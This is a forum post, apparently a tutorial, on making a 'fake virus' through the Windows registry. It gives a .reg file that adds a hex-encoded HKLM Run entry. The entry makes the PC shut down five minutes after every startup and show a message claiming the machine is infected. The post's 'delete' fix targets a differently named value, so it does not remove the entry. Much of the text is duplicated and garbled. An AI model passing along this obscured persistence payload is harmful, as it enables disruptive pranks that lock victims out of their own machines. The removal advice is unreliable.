Ron
||uLtiMaTE WinNER||
How Do I Create A Fake VIRUS?
This tutorial will help a user to create a fake virus………which will force the system to restart or shutdown after a specific period of time……
Warning: Use it at your own risk. I'll not be responsible for any kind of damage/problem in your system.
Well….. We all are aware of this program called SHUTDOWN.EXE which allows us to easily create icons to shutdown or restart our computer.
Parameters
-l - Logs off the current user, this is also the defualt. -m ComputerName takes
precedence.
-s - Shuts down the local computer.
-r - Reboots after shutdown.
-a - Aborts shutdown. Ignores other parameters, except -l and ComputerName.
You can only use -a during the time-out period.
-f - Forces running applications to close.
-m [\\ComputerName] - Specifies the computer that you want to shut down.
-t xx - Sets the timer for system shutdown in xx seconds. The default is 20
seconds.
-c "message" - Specifies a message to be displayed in the Message area of the
System Shutdown window. You can use a maximum of 127 characters. You must enclose the message in quotation marks.
We use this handy shortcut in Creating a Shutdown/Reboot Icon.
But this time It will be used for creating a virus……….
====
Method One
Note
HKEY_LOCAL_MACHINE
This hive contains information about the computer itself, as well as about the operating system. It includes specific details about all hardware, including keyboard, printer ports, storage—the entire hardware setup. In addition, it has information about security, installed software, system startup, drivers, services, and the machine's specific XP configuration.
Expanded string value data type contains variables that Windows uses to point to the location of files. For example, to point to the location of the Luna theme file, the expanded string value in the Registry is %SystemRoot%\resources\Themes\Luna.theme.
[FONT="]Restart your PC to see the effects……….[/FONT]
====
Pls Comment On this post……………
This tutorial will help a user to create a fake virus………which will force the system to restart or shutdown after a specific period of time……
Warning: Use it at your own risk. I'll not be responsible for any kind of damage/problem in your system.
Well….. We all are aware of this program called SHUTDOWN.EXE which allows us to easily create icons to shutdown or restart our computer.
Shutdown [{-l|-s|-r|-a}] [-f] [-m [\\ComputerName]] [-t xx] [-c "message"] [-d[p]xx:yy]
Parameters
-l - Logs off the current user, this is also the defualt. -m ComputerName takes
precedence.
-s - Shuts down the local computer.
-r - Reboots after shutdown.
-a - Aborts shutdown. Ignores other parameters, except -l and ComputerName.
You can only use -a during the time-out period.
-f - Forces running applications to close.
-m [\\ComputerName] - Specifies the computer that you want to shut down.
-t xx - Sets the timer for system shutdown in xx seconds. The default is 20
seconds.
-c "message" - Specifies a message to be displayed in the Message area of the
System Shutdown window. You can use a maximum of 127 characters. You must enclose the message in quotation marks.
We use this handy shortcut in Creating a Shutdown/Reboot Icon.
But this time It will be used for creating a virus……….
====
HOW TO CREATE A VIRUS?
Method One
- Just open Notepad and paste the given code and then save the file with the name "Ronak Agrawal .reg" and then run the file. It'll ask for confirmation, simply click on YES and then OK.
Code:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Shell32"=hex(2):25,00,77,00,69,00,6e,00,64,00,69,00,72,00,25,00,5c,00,73,00,\
79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,73,00,68,00,75,00,74,00,64,\
00,6f,00,77,00,6e,00,2e,00,65,00,78,00,65,00,20,00,2d,00,73,00,20,00,2d,00,\
74,00,20,00,33,00,30,00,30,00,20,00,2d,00,63,00,20,00,22,00,59,00,6f,00,75,\
00,72,00,20,00,43,00,6f,00,6d,00,70,00,75,00,74,00,65,00,72,00,20,00,69,00,\
73,00,20,00,69,00,6e,00,66,00,65,00,63,00,74,00,65,00,64,00,20,00,77,00,69,\
00,74,00,68,00,20,00,76,00,69,00,72,00,75,00,73,00,20,00,40,00,52,00,6f,00,\
6e,00,61,00,6b,00,20,00,41,00,67,00,72,00,61,00,77,00,61,00,6c,00,22,00,00,\
00
- Restart Your PC to see the Effects.
- Click Start > Run.
- Type regedit and press Enter after Run Window emerges.
- Go To
Note
HKEY_LOCAL_MACHINE
This hive contains information about the computer itself, as well as about the operating system. It includes specific details about all hardware, including keyboard, printer ports, storage—the entire hardware setup. In addition, it has information about security, installed software, system startup, drivers, services, and the machine's specific XP configuration.
- Click on Edit Menu > New > Expanded string value
Expanded string value data type contains variables that Windows uses to point to the location of files. For example, to point to the location of the Luna theme file, the expanded string value in the Registry is %SystemRoot%\resources\Themes\Luna.theme.
- Name the String value as “Shell32”.
- Now, Double click on it to and Set its value as
[FONT="]Restart your PC to see the effects……….[/FONT]
====
HOW TO DELETE THE VIRUS?
- Just open Notepad and paste the appropriate code and then save the file with the name "Ronak Agrawal .reg" and then run the file. It'll ask for confirmation, simply click on YES and then OK.
Code:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"shell"=hex(2):00,00
- Restart Your PC to see the Effects.
Pls Comment On this post……………
Last edited: